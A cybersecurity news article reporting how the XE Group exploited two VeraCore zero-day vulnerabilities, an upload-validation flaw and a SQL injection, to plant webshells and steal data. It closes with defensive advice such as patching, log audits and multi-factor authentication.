Friday, May 9, 2025
Homecyber securityXE Hacker Group Exploiting Veracore 0-Day’s to Deploy Malware & Steal Credit...

XE Hacker Group Exploiting Veracore 0-Day’s to Deploy Malware & Steal Credit Card Details

Published on

SIEM as a Service

Follow Us on Google News

The XE Group, a sophisticated Vietnamese-origin cybercrime organization active since 2013, has escalated its operations by exploiting two zero-day vulnerabilities in VeraCore software, CVE-2024-57968 and CVE-2025-25181.

These vulnerabilities, identified in a joint investigation by Intezer and Solis Security, have been used to deploy malware, steal sensitive information, and maintain long-term access to compromised systems.

VeraCore is widely utilized by fulfillment companies and e-retailers for warehouse and order management, making it a lucrative target for supply chain attacks.

- Advertisement - Google News

The group’s recent activities reflect a notable shift from their earlier focus on credit card skimming to more advanced techniques involving zero-day exploits.

This evolution underscores the growing sophistication of XE Group’s operations and their ability to adapt to emerging opportunities in the cybercrime landscape.

Upload Validation & SQL Injection Flaws

The two exploited vulnerabilities in VeraCore highlight critical security gaps:

  1. CVE-2024-57968 (Upload Validation Vulnerability): This flaw allowed attackers to bypass file upload security filters and deploy malicious webshells on targeted servers. The webshells provided unauthorized access for data exfiltration and malware deployment.
  2. CVE-2025-25181 (SQL Injection Vulnerability): This weakness enabled the execution of arbitrary SQL commands, facilitating credential theft and lateral movement within networks.

These vulnerabilities were first exploited as early as 2020, when XE Group gained access to a VeraCore system through SQL injection and uploaded webshells.

XE Hacker Group
Execution of the shellcode using Speakeasy.

Remarkably, they reactivated these webshells in 2024, demonstrating their persistence and strategic patience.

From Credit Card Skimming to Advanced Cybercrime

Initially known for credit card skimming through supply chain attacks, XE Group has evolved into a more dangerous threat actor.

Their earlier campaigns involved injecting malicious JavaScript into payment platforms and deploying password-stealing malware.

However, since 2024, the group has shifted its focus to exploiting enterprise software vulnerabilities for information theft and supply chain disruptions.

The group’s use of customized ASPXSpy webshells authenticated with unique base64-encoded strings has been pivotal in maintaining long-term access to compromised systems.

According to the Intezer, these webshells enable file system exploration, database manipulation, and network reconnaissance.

Additionally, XE Group employs obfuscated PowerShell scripts to load Remote Access Trojans (RATs), further enhancing their stealth and operational reach.

The exploitation of zero-day vulnerabilities by XE Group highlights the critical need for proactive cybersecurity measures.

Organizations using VeraCore or similar software should immediately:

  • Apply available patches or disable vulnerable features as advised by vendors.
  • Conduct thorough audits of system logs and network traffic for indicators of compromise.
  • Implement multi-factor authentication (MFA) to strengthen access controls.
  • Monitor threat intelligence feeds for known XE Group tactics and indicators.

The persistence of XE Group’s activities spanning years emphasizes the importance of robust incident response protocols.

Their ability to exploit unpatched vulnerabilities and maintain long-term access poses a severe risk to global supply chains, particularly in the manufacturing and distribution sectors.

XE Group’s transition from credit card skimming to exploiting zero-day vulnerabilities marks a significant escalation in their cybercrime capabilities.

By targeting enterprise software like VeraCore, they have demonstrated adaptability and operational discipline, posing a formidable challenge to cybersecurity defenses worldwide.

The case serves as a stark reminder of the importance of addressing software vulnerabilities promptly and investing in advanced detection systems to mitigate emerging threats.

Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free

Aman Mishra
Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.

Latest articles

New Advanced Phishing Attack Exploits Discord to Target Crypto Users

Check Point Research has uncovered a sophisticated phishing campaign that leverages Discord to target...

Fedora Linux Joins the Windows Subsystem for Linux Officially

Fedora Project has announced the official availability of Fedora Linux on the Windows Subsystem...

Microsoft Launches “Copilot+ PC” for an Upgraded Windows Experience

Microsoft has announced a significant wave of new Windows experiences designed for Copilot+ PCs,...

Nomad Bridge Hacker Apprehended in Connection with $190 Million Heist

Alexander Gurevich, a 47-year-old dual Russian-Israeli citizen, was arrested last Thursday at Ben-Gurion Airport...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

New Advanced Phishing Attack Exploits Discord to Target Crypto Users

Check Point Research has uncovered a sophisticated phishing campaign that leverages Discord to target...

Fedora Linux Joins the Windows Subsystem for Linux Officially

Fedora Project has announced the official availability of Fedora Linux on the Windows Subsystem...

Microsoft Launches “Copilot+ PC” for an Upgraded Windows Experience

Microsoft has announced a significant wave of new Windows experiences designed for Copilot+ PCs,...